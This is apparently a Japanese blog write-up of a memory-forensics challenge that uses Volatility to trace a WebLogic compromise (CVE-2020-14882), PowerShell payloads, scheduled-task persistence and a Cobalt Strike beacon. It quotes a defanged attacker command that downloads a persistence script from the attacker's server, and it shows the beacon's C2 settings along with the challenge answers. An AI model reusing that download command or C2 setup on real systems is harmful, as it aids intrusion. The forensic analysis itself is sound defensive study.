0xb68cb3266780	TCPv6	2001:0:2851:782c:d2:133b:3f57:6f7c	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb32ba4f0	TCPv6	::1	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:01.000000 
0xb68cb335c260	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb33b4d00	TCPv4	192.168.144.131	80	192.168.144.1	27919	CLOSED	508	svchost.exe	2021-08-06 15:51:39.000000 
0xb68cb346d370	TCPv4	192.168.144.131	49903	192.168.144.129	1337	CLOSED	1488	svchost.exe	2021-08-06 16:17:52.000000 
0xb68cb34faa40	TCPv4	192.168.144.131	49901	192.168.144.129	1337	CLOSED	1488	svchost.exe	2021-08-06 16:15:52.000000 
0xb68cb350dab0	TCPv4	192.168.144.131	49907	192.168.144.129	1337	CLOSE_WAIT	1488	svchost.exe	2021-08-06 16:21:53.000000 
0xb68cb3578ec0	UDPv4	0.0.0.0	5355	*	0		1100	svchost.exe	2021-08-06 16:11:24.000000 
0xb68cb380eec0	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb380eec0	UDPv6	::	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
0xb68cb3832260	UDPv4	0.0.0.0	5355	*	0		1100	svchost.exe	2021-08-06 16:11:24.000000 
0xb68cb3832260	UDPv6	::	5355	*	0		1100	svchost.exe	2021-08-06 16:11:24.000000 
0xb68cb385e2e0	TCPv4	192.168.144.131	49905	192.168.144.129	1337	CLOSED	1488	svchost.exe	2021-08-06 16:19:53.000000 
0xe000001a9300	TCPv4	0.0.0.0	49668	0.0.0.0	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xe000001a9300	TCPv6	::	49668	::	0	LISTENING	1592	spoolsv.exe	2021-08-06 15:26:34.000000 
0xf8024bdf2ec0	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xf8024be475c0	TCPv4	127.0.0.1	49686	127.0.0.1	49687	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xf8024bf34ec0	UDPv4	0.0.0.0	0	*	0		4344	powershell.exe	2021-08-06 15:54:58.000000 
remnux@remnux:~/Downloads$

WeblogicのデフォルトのadminコンソールPortが7001なのと、WebのPortが80で開いていることを確認すれば回答可能です。

Ans: 80:7001

The attacker gain access through WebLogic Server. What is the PID of the process responsible for the initial exploit?

前の問題で確認したコマンドwindows.netscan.Netscanで7001があいているPortのPIDを確認すればいい。

0xb68cb2c58a50	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000 
0xb68cb2cc8580	TCPv4	127.0.0.1	49680	127.0.0.1	49679	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2ccc010	TCPv4	127.0.0.1	49679	127.0.0.1	49680	ESTABLISHED	4752	java.exe	2021-08-06 15:30:28.000000 
0xb68cb2cffb20	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	5556	::	0	LISTENING	4456	java.exe	2021-08-06 15:30:03.000000 
0xb68cb2cffc70	TCPv6	7f00:1::98b0:6cb1:8cb6:ffff	1527	::	0	LISTENING	4772	java.exe	2021-08-06 15:30:07.000000 
0xb68cb2e135c0	TCPv4	127.0.0.1	49686	127.0.0.1	49687	ESTABLISHED	4752	java.exe	2021-08-06 15:30:39.000000 
0xb68cb2e57ec0	TCPv6	c0a8:9083::c8e0:70b2:8cb6:ffff	7001	::	0	LISTENING	4752	java.exe	2021-08-06 15:31:00.000000

Ans: 4752

what is the PID of the next entry to the previous process? (Hint: ActiveProcessLinks list)

plistがヒントと言っているのでplistを確認する。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.pslist.PsList
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

...省略

2196	508	sihost.exe	0xb68cb2b79080	8	-	1	False	2021-08-06 15:29:13.000000 	N/A	Disabled
2756	652	svchost.exe	0xb68cb28f2480	6	-	1	False	2021-08-06 15:29:13.000000 	N/A	Disabled
2424	508	taskhostw.exe	0xb68cb2d34800	13	-	1	False	2021-08-06 15:29:13.000000 	N/A	Disabled
1140	560	userinit.exe	0xb68cb2b73280	0	-	1	False	2021-08-06 15:29:16.000000 	2021-08-06 15:29:40.000000 	Disabled
2676	1140	explorer.exe	0xb68cb2d36800	50	-	1	False	2021-08-06 15:29:16.000000 	N/A	Disabled
3496	764	ShellExperienc	0xb68cb2d30800	33	-	1	False	2021-08-06 15:29:21.000000 	N/A	Disabled
3408	764	SearchUI.exe	0xb68cb2d2e800	43	-	1	False	2021-08-06 15:29:21.000000 	N/A	Disabled
2552	3488	ServerManager.	0xb68cb2f17800	12	-	1	False	2021-08-06 15:29:22.000000 	N/A	Disabled
3732	2676	vmtoolsd.exe	0xb68cb2b6d800	8	-	1	False	2021-08-06 15:29:32.000000 	N/A	Disabled
4172	4132	jusched.exe	0xb68cb3039800	1	-	1	True	2021-08-06 15:29:34.000000 	N/A	Disabled
4356	2676	cmd.exe	0xb68cb317d340	1	-	1	False	2021-08-06 15:29:59.000000 	N/A	Disabled
4364	4356	conhost.exe	0xb68cb277f800	3	-	1	False	2021-08-06 15:29:59.000000 	N/A	Disabled
4456	4356	java.exe	0xb68cb2f21800	16	-	1	False	2021-08-06 15:30:00.000000 	N/A	Disabled
4556	2676	cmd.exe	0xb68cb2cfb600	1	-	1	False	2021-08-06 15:30:04.000000 	N/A	Disabled
4564	4556	conhost.exe	0xb68cb2a1f480	3	-	1	False	2021-08-06 15:30:04.000000 	N/A	Disabled
4736	4556	cmd.exe	0xb68cb2333080	1	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled
4752	4556	java.exe	0xb68cb23e4080	44	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled
4772	4736	java.exe	0xb68cb2344080	18	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled
1392	4172	jucheck.exe	0xb68cb3476080	4	-	1	True	2021-08-06 15:34:34.000000 	N/A	Disabled
2824	560	fontdrvhost.ex	0xb68cb1ff3080	5	-	1	False	2021-08-06 15:35:54.000000 	N/A	Disabled
840	652	armsvc.exe	0xb68cb2451380	2	-	0	True	2021-08-06 15:41:38.000000 	N/A	Disabled
4344	4752	powershell.exe	0xb68cb32c6800	15	-	1	False	2021-08-06 15:51:40.000000 	N/A	Disabled
4636	4344	conhost.exe	0xb68cb2444680	1	-	1	False	2021-08-06 15:51:40.000000 	N/A	Disabled
4200	4752	powershell.exe	0xb68cb356f080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
2712	4752	powershell.exe	0xb68cb322f800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 	Disabled
2132	4752	powershell.exe	0xb68cb33c9080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
4264	4752	powershell.exe	0xb68cb22fe080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
3684	4752	powershell.exe	0xb68cb2df3080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
3676	4752	powershell.exe	0xb68cb1f64080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 	Disabled
3520	4752	powershell.exe	0xb68cb3045080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
1012	4752	powershell.exe	0xb68cb32fa800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
2200	4752	powershell.exe	0xb68cb34b6800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 	Disabled
776	4752	powershell.exe	0xb68cb34c2800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
1616	4752	powershell.exe	0xb68cb34ca800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 	Disabled
2688	2676	mmc.exe	0xb68cb382a5c0	14	-	1	False	2021-08-06 15:56:56.000000 	N/A	Disabled
1488	4344	svchost.exe	0xb68cb24b5080	7	-	1	False	2021-08-06 16:06:50.000000 	N/A	Disabled
4596	800	notepad.exe	0xb68cb3309080	3	-	1	False	2021-08-06 16:12:52.000000 	N/A	Disabled
2568	2676	RamCapture64.e	0xb68cb3256580	4	-	1	False	2021-08-06 16:13:20.000000 	N/A	Disabled
3524	2568	conhost.exe	0xb68cb3871800	3	-	1	False	2021-08-06 16:13:20.000000 	N/A	Disabled

4752の次の4772を選択すればよい。

Ans: 4772

How many threads does the process responsible for the initial exploit have?

上記でみたwindows.pslist.Pslistコマンドでの結果にThreadが記載されている。
また、windows.psscan.Psscanでも確認できる。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.psscan.PsScan --pid 4752
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

4752	4556	java.exe	0xb68cb23e4080	44	-	1	False	2021-08-06 15:30:05.000000 	N/A	Disabled

Ans: 44

The attacker gain access to the system through the webserver. What is the CVE number of the vulnerability exploited?

windows.pstree.PstreeコマンドでPID4752を親に持つプロセスを確認する。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.pstree.PsTree
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime

4	0	System	0xb68cb04ac040	113	-	N/A	False	2021-08-06 15:26:02.000000 	N/A
* 292	4	smss.exe	0xb68cb168f800	2	-	N/A	False	2021-08-06 15:26:02.000000 	N/A
** 504	292	smss.exe	0xb68cb1ccf080	0	-	1	False	2021-08-06 15:26:11.000000 	2021-08-06 15:26:11.000000 
*** 512	504	csrss.exe	0xb68cb17d9540	12	-	1	False	2021-08-06 15:26:11.000000 	N/A
*** 560	504	winlogon.exe	0xb68cb1ea5080	2	-	1	False	2021-08-06 15:26:11.000000 	N/A
**** 912	560	dwm.exe	0xb68cb1ff5080	15	-	1	False	2021-08-06 15:26:18.000000 	N/A
**** 2824	560	fontdrvhost.ex	0xb68cb1ff3080	5	-	1	False	2021-08-06 15:35:54.000000 	N/A
**** 1140	560	userinit.exe	0xb68cb2b73280	0	-	1	False	2021-08-06 15:29:16.000000 	2021-08-06 15:29:40.000000 
***** 2676	1140	explorer.exe	0xb68cb2d36800	50	-	1	False	2021-08-06 15:29:16.000000 	N/A
****** 2688	2676	mmc.exe	0xb68cb382a5c0	14	-	1	False	2021-08-06 15:56:56.000000 	N/A
****** 4356	2676	cmd.exe	0xb68cb317d340	1	-	1	False	2021-08-06 15:29:59.000000 	N/A
******* 4456	4356	java.exe	0xb68cb2f21800	16	-	1	False	2021-08-06 15:30:00.000000 	N/A
******* 4364	4356	conhost.exe	0xb68cb277f800	3	-	1	False	2021-08-06 15:29:59.000000 	N/A
****** 2568	2676	RamCapture64.e	0xb68cb3256580	4	-	1	False	2021-08-06 16:13:20.000000 	N/A
******* 3524	2568	conhost.exe	0xb68cb3871800	3	-	1	False	2021-08-06 16:13:20.000000 	N/A
****** 4556	2676	cmd.exe	0xb68cb2cfb600	1	-	1	False	2021-08-06 15:30:04.000000 	N/A
******* 4736	4556	cmd.exe	0xb68cb2333080	1	-	1	False	2021-08-06 15:30:05.000000 	N/A
******** 4772	4736	java.exe	0xb68cb2344080	18	-	1	False	2021-08-06 15:30:05.000000 	N/A
******* 4564	4556	conhost.exe	0xb68cb2a1f480	3	-	1	False	2021-08-06 15:30:04.000000 	N/A
******* 4752	4556	java.exe	0xb68cb23e4080	44	-	1	False	2021-08-06 15:30:05.000000 	N/A
******** 3520	4752	powershell.exe	0xb68cb3045080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 3684	4752	powershell.exe	0xb68cb2df3080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 4200	4752	powershell.exe	0xb68cb356f080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 4264	4752	powershell.exe	0xb68cb22fe080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 776	4752	powershell.exe	0xb68cb34c2800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 2712	4752	powershell.exe	0xb68cb322f800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 
******** 1616	4752	powershell.exe	0xb68cb34ca800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 2132	4752	powershell.exe	0xb68cb33c9080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 1012	4752	powershell.exe	0xb68cb32fa800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:44.000000 
******** 4344	4752	powershell.exe	0xb68cb32c6800	15	-	1	False	2021-08-06 15:51:40.000000 	N/A
********* 1488	4344	svchost.exe	0xb68cb24b5080	7	-	1	False	2021-08-06 16:06:50.000000 	N/A
********* 4636	4344	conhost.exe	0xb68cb2444680	1	-	1	False	2021-08-06 15:51:40.000000 	N/A
******** 3676	4752	powershell.exe	0xb68cb1f64080	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 
******** 2200	4752	powershell.exe	0xb68cb34b6800	0	-	1	False	2021-08-06 15:51:40.000000 	2021-08-06 15:51:45.000000 
****** 3732	2676	vmtoolsd.exe	0xb68cb2b6d800	8	-	1	False	2021-08-06 15:29:32.000000 	N/A
2552	3488	ServerManager.	0xb68cb2f17800	12	-	1	False	2021-08-06 15:29:22.000000 	N/A
4172	4132	jusched.exe	0xb68cb3039800	1	-	1	True	2021-08-06 15:29:34.000000 	N/A
* 1392	4172	jucheck.exe	0xb68cb3476080	4	-	1	True	2021-08-06 15:34:34.000000 	N/A
4596	800	notepad.exe	0xb68cb3309080	3	-	1	False	2021-08-06 16:12:52.000000 	N/A
remnux@remnux:~/Downloads$

ほぼほぼPSでExploitされているのがわかる。
以前確認したwindows.cmdline.CmdLineのコマンドからもわかるようにPID 4344でBase64で難読化されたペイロードも実行されていることがわかる。
Powershell Weblogic RCEなどで検索すると以下のサイトがヒットする。

CVE-2020-14882が回答ですかね。

Ans: CVE-2020-14882

The attacker used the vulnerability he found in the webserver to execute a reverse shell command to his own server. Provide the IP and port of the attacker server? Format: IP:port

cmdlineのBase64で難読化されたExploitを復号する。以下サイトで復号した。

image.png
復号完了!回答する。

Ans: 192.168.144.129:1339

multiple files were downloaded from the attacker's web server. Provide the Command used to download the PowerShell script used for persistence?

PID 4344の難読化されたペイロード以降で実施されているPSを調べてみる。
メモリ展開されているマルウェアぽいのでメモリダンプを取得する。vol3のmemmapコマンドでもいいのだが、今回は一気にpowershell.exeのDumpを取りたかったのでVolatility2で取得する。

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393 memdump -n powershell.exe -D out
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
************************************************************************
Writing powershell.exe [  4344] to 4344.dmp
************************************************************************
Writing powershell.exe [  4200] to 4200.dmp
************************************************************************
Writing powershell.exe [  2712] to 2712.dmp
************************************************************************
Writing powershell.exe [  2132] to 2132.dmp
************************************************************************
Writing powershell.exe [  4264] to 4264.dmp
************************************************************************
Writing powershell.exe [  3684] to 3684.dmp
************************************************************************
Writing powershell.exe [  3676] to 3676.dmp
************************************************************************
Writing powershell.exe [  3520] to 3520.dmp
************************************************************************
Writing powershell.exe [  1012] to 1012.dmp
************************************************************************
Writing powershell.exe [  2200] to 2200.dmp
************************************************************************
Writing powershell.exe [   776] to 776.dmp
************************************************************************
Writing powershell.exe [  1616] to 1616.dmp
remnux@remnux:~/Downloads$

一気にoutディレクトリ階層にメモリダンプを格納できた。

remnux@remnux:~/Downloads/out$ ls -lta
total 7077676
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 1616.dmp
drwxrwxr-x 2 remnux remnux      4096 Jun 12 10:19 .
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 776.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 2200.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 1012.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 3520.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 3676.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 3684.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:19 4264.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:18 2132.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:18 2712.dmp
-rw-rw-r-- 1 remnux remnux 597065728 Jun 12 10:18 4200.dmp
-rw-rw-r-- 1 remnux remnux 679759872 Jun 12 10:18 4344.dmp
drwxr-xr-x 3 remnux remnux      4096 Jun 12 10:17 ..

このメモリダンプを1つ1つstringsで中身を確認する。回答はほぼC2のアドレスだと踏んでたのでgrepもかけておく。

remnux@remnux:~/Downloads/out$ strings -e l 4344.dmp | grep http://192.168.144.129

18.png
ここから文字数にあうコマンドを回答する。
※以下はDefangしてます。

Ans: Invoke-WebRequest -Uri "http[:]//192.168.144.129:1338/presist.ps1" -OutFile "./presist.ps1"

What is the MITRE ID related to the persistence technique the attacker used?

cmdlineのコマンド結果で、PSのExploitの流れが終了した後のPID 2688のコマンドを確認すれば予想がつくと思う。

2688	mmc.exe	"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s

taskschdなので、タスクスケジューラを用いた常駐化だ。あとはMITRE ATT&CKで検索するだけ。

Ans: T1053.005

After maintaining persistence, the attacker dropped a cobalt strike beacon. Try to analyze it and provide the Publickey_MD5.

PID 2688のあとのコマンドラインのPID 1488を確認すればわかると思うが、Desktopにsvchost.exeがあるのは おかしい ので偽装されているマルウェア(cobalt strike beacon)と判断する。
一応windows.malfind.Malfindコマンドで判断もしておく。

remnux@remnux:~/Downloads$ vol3 -f memory.mem windows.malfind.Malfind
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished                        
PID	Process	Start VPN	End VPN	Tag	Protection	CommitCharge	PrivateMemory	File output	Hexdump	Disasm

1876	MsMpEng.exe	0x202d43d0000	0x202d43d0fff	VadS	PAGE_EXECUTE_READWRITE	1	1	Disabled	
55 48 8d 2c 24 48 83 ec	UH.,$H..
20 48 8b 01 48 8b 49 08	.H..H.I.
ff d0 48 8d 65 00 5d c3	..H.e.].
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........
cc cc cc cc cc cc cc cc	........	
0x202d43d0000:	push	rbp
0x202d43d0001:	lea	rbp, [rsp]
0x202d43d0005:	sub	rsp, 0x20
0x202d43d0009:	mov	rax, qword ptr [rcx]
0x202d43d000c:	mov	rcx, qword ptr [rcx + 8]
0x202d43d0010:	call	rax
0x202d43d0012:	lea	rsp, [rbp]
0x202d43d0016:	pop	rbp
0x202d43d0017:	ret	
0x202d43d0018:	int3	
0x202d43d0019:	int3	
0x202d43d001a:	int3	

...省略

2688	mmc.exe	0x7ff7e2310000	0x7ff7e231ffff	VadS	PAGE_EXECUTE_READWRITE	1	1	Disabled	
00 00 00 00 00 00 00 00	........
78 0d 00 00 00 00 00 00	x.......
45 00 00 00 49 c7 c2 00	E...I...
00 00 00 48 b8 c0 48 ad	...H..H.
d1 fc 7f 00 00 ff e0 49	.......I
c7 c2 01 00 00 00 48 b8	......H.
c0 48 ad d1 fc 7f 00 00	.H......
ff e0 49 c7 c2 02 00 00	..I.....	
0x7ff7e2310000:	add	byte ptr [rax], al
0x7ff7e2310002:	add	byte ptr [rax], al
0x7ff7e2310004:	add	byte ptr [rax], al
0x7ff7e2310006:	add	byte ptr [rax], al
0x7ff7e2310008:	js	0x7ff7e2310017
0x7ff7e231000a:	add	byte ptr [rax], al
0x7ff7e231000c:	add	byte ptr [rax], al
0x7ff7e231000e:	add	byte ptr [rax], al
0x7ff7e2310010:	add	byte ptr [r8], r8b
0x7ff7e2310013:	add	byte ptr [rcx - 0x39], cl
0x7ff7e2310016:	ret	0
0x7ff7e2310019:	add	byte ptr [rax], al
0x7ff7e231001b:	movabs	rax, 0x7ffcd1ad48c0
0x7ff7e2310025:	jmp	rax
0x7ff7e2310027:	mov	r10, 1
0x7ff7e231002e:	movabs	rax, 0x7ffcd1ad48c0
0x7ff7e2310038:	jmp	rax
1488	svchost.exe	0xb30000	0xb7bfff	VadS	PAGE_EXECUTE_READWRITE	76	1	Disabled	
4d 5a 41 52 55 48 89 e5	MZARUH..
48 81 ec 20 00 00 00 48	H......H
8d 1d ea ff ff ff 48 89	......H.
df 48 81 c3 f4 63 01 00	.H...c..
ff d3 41 b8 f0 b5 a2 56	..A....V
68 04 00 00 00 5a 48 89	h....ZH.
f9 ff d0 00 00 00 00 00	........
00 00 00 00 f8 00 00 00	........	
0xb30000:	pop	r10
0xb30002:	push	r10
0xb30004:	push	rbp
0xb30005:	mov	rbp, rsp
0xb30008:	sub	rsp, 0x20
0xb3000f:	lea	rbx, [rip - 0x16]
0xb30016:	mov	rdi, rbx
0xb30019:	add	rbx, 0x163f4
0xb30020:	call	rbx
0xb30022:	mov	r8d, 0x56a2b5f0
0xb30028:	push	4
0xb3002d:	pop	rdx
0xb3002e:	mov	rcx, rdi
0xb30031:	call	rax
0xb30033:	add	byte ptr [rax], al
0xb30035:	add	byte ptr [rax], al
0xb30037:	add	byte ptr [rax], al
0xb30039:	add	byte ptr [rax], al
0xb3003b:	add	al, bh
0xb3003d:	add	byte ptr [rax], al
1488	svchost.exe	0x3160000	0x355ffff	VadS	PAGE_EXECUTE_READWRITE	1024	1	Disabled	
fc 48 83 e4 f0 eb 33 5d	.H....3]
8b 45 00 48 83 c5 04 8b	.E.H....
4d 00 31 c1 48 83 c5 04	M.1.H...
55 8b 55 00 31 c2 89 55	U.U.1..U
00 31 d0 48 83 c5 04 83	.1.H....
e9 04 31 d2 39 d1 74 02	..1.9.t.
eb e7 58 fc 48 83 e4 f0	..X.H...
ff d0 e8 c8 ff ff ff 3d	.......=	
0x3160000:	cld	
0x3160001:	and	rsp, 0xfffffffffffffff0
0x3160005:	jmp	0x316003a
0x3160007:	pop	rbp
0x3160008:	mov	eax, dword ptr [rbp]
0x316000b:	add	rbp, 4
0x316000f:	mov	ecx, dword ptr [rbp]
0x3160012:	xor	ecx, eax
0x3160014:	add	rbp, 4
0x3160018:	push	rbp
0x3160019:	mov	edx, dword ptr [rbp]
0x316001c:	xor	edx, eax
0x316001e:	mov	dword ptr [rbp], edx
0x3160021:	xor	eax, edx
0x3160023:	add	rbp, 4
0x3160027:	sub	ecx, 4
0x316002a:	xor	edx, edx
0x316002c:	cmp	ecx, edx
0x316002e:	je	0x3160032
0x3160030:	jmp	0x3160019
0x3160032:	pop	rax
0x3160033:	cld	
0x3160034:	and	rsp, 0xfffffffffffffff0
0x3160038:	call	rax
0x316003a:	call	0x3160007
remnux@remnux:~/Downloads$

怪しいって言われているので此奴を調べる。さっきのVolatility2で取ったメモリダンプの取り方でこいつを取る。

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393  memdump -p 1488 -D out
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
************************************************************************
Writing svchost.exe [  1488] to 1488.dmp
remnux@remnux:~/Downloads$

ビーコンのkeyを取得するために上記Parserを用いる。
このParser環境を整備するためにgitからクローンした後、python3-venvを用いて以下のようにパッケージを落とす。

remnux@remnux:~/Downloads$ git clone https://github.com/Sentinel-One/CobaltStrikeParser
Cloning into 'CobaltStrikeParser'...
remote: Enumerating objects: 146, done.
remote: Counting objects: 100% (62/62), done.
remote: Compressing objects: 100% (48/48), done.
remote: Total 146 (delta 29), reused 23 (delta 14), pack-reused 84
Receiving objects: 100% (146/146), 988.99 KiB | 8.67 MiB/s, done.
Resolving deltas: 100% (61/61), done.
remnux@remnux:~/Downloads$ python3 -m venv venv
remnux@remnux:~/Downloads$ source ./venv/bin/activate
(venv) remnux@remnux:~/Downloads$ cd CobaltStrikeParser/
(venv) remnux@remnux:~/Downloads/CobaltStrikeParser$ pip install -r requirements.txt

さて、実行しますか!ビーコンのバージョンをv4指定し、パースする。

(venv) remnux@remnux:~/Downloads/CobaltStrikeParser$ python3 ./parse_beacon_config.py --version 4 ../out/1488.dmp 
BeaconType                       - HTTP
Port                             - 1337
SleepTime                        - 60000
MaxGetSize                       - 1048576
Jitter                           - 0
MaxDNS                           - 255
PublicKey_MD5                    - fc627cf00878e4d4f7997cb26a80e6fc
C2Server                         - 192.168.144.129,/updates.rss
UserAgent                        - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) LBBROWSER
HttpPostUri                      - /submit.php
Malleable_C2_Instructions        - Empty
HttpGet_Metadata                 - Metadata
                                   	base64
                                   	header "Cookie"
HttpPost_Metadata                - ConstHeaders
                                   	Content-Type: application/octet-stream
                                   SessionId
                                   	parameter "id"
                                   Output
                                   	print
PipeName                         - 
DNS_Idle                         - 0.0.0.0
DNS_Sleep                        - 0
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       - 
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\rundll32.exe
Spawnto_x64                      - %windir%\sysnative\rundll32.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark_Hash                   - Not Found
Watermark                        - 305419896
bStageCleanup                    - False
bCFGCaution                      - False
KillDate                         - 0
bProcInject_StartRWX             - True
bProcInject_UseRWX               - True
bProcInject_MinAllocSize         - 0
ProcInject_PrependAppend_x86     - Empty
ProcInject_PrependAppend_x64     - Empty
ProcInject_Execute               - CreateThread
                                   SetThreadContext
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - VirtualAllocEx
bUsesCookies                     - True
HostHeader                       - 
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - Not Found
DNS_strategy_rotate_seconds      - Not Found
DNS_strategy_fail_x              - Not Found
DNS_strategy_fail_seconds        - Not Found
Retry_Max_Attempts               - Not Found
Retry_Increase_Attempts          - Not Found
Retry_Duration                   - Not Found
(venv) remnux@remnux:~/Downloads/CobaltStrikeParser$

Ans: fc627cf00878e4d4f7997cb26a80e6fc

What is the URL of the exfiltrated data?

cmdlineの結果からPID 4596で使用されていることがわかる。こいつもVolatility2でメモリダンプを取得する。

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393  memdump -p 4596 -D out
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
************************************************************************
Writing notepad.exe [  4596] to 4596.dmp

exfiltrator.txtをいじくってそうな周りにURLがあるか確認する。

remnux@remnux:~/Downloads/out$ strings -e l 4596.dmp | grep -9 exfiltrator.txt | grep https://

21.png
こいつを回答。
※Defangしてます。

Ans: https[:]//pastebin.com/A0Ljk8tu

最後に

Volatility、主に3の良い練習になりました。
Volatility2の方も3では存在しない機能(Shellとか)があったりするのでそこら辺の練習もしたいなと思います!!!!
(ほぼwindows.cmdline.CmdLineコマンドに頼って答えに辿り着きました。)

今回もセキュリティエンジニアの皆さんの助けになればなと思います。

1
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?